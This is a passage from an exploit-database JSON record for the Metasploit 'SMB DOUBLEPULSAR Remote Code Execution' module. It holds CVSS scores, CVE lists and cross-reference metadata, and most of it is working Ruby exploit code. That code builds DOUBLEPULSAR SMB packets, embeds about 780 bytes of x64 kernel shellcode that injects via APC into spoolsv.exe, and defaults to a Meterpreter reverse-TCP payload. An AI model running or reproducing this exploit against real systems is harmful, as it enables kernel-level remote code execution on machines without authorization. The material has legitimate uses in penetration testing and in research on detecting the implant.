param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-07T11:46:19", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2af769d2f0f395f48de4732f348253ce", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-12T11:50:45", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419", "CPAI-2017-0205", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0200", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-12T11:50:45", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-11-12T11:50:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": ""}, "lastseen": "2021-11-12T11:50:45", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "90b8d0833fc6be46c6824f7750ed36c5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-12T17:48:41", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703", "SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-12T17:48:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-12T17:48:41", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == 